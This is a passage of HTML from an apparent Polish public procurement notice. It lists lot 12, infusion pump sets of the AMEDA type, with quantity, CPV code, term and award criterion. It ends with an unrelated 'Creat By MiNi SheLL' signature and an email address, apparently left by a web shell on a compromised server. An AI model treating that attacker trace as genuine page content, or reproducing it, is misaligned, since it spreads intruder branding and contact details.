<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - APARATY DO POMP INFUZYJNYCH PRZEPŁYWOWYCH TYPU AMEDA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aparaty do pomp infuzyjnych przepływowych typu AMEDA			1 100	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com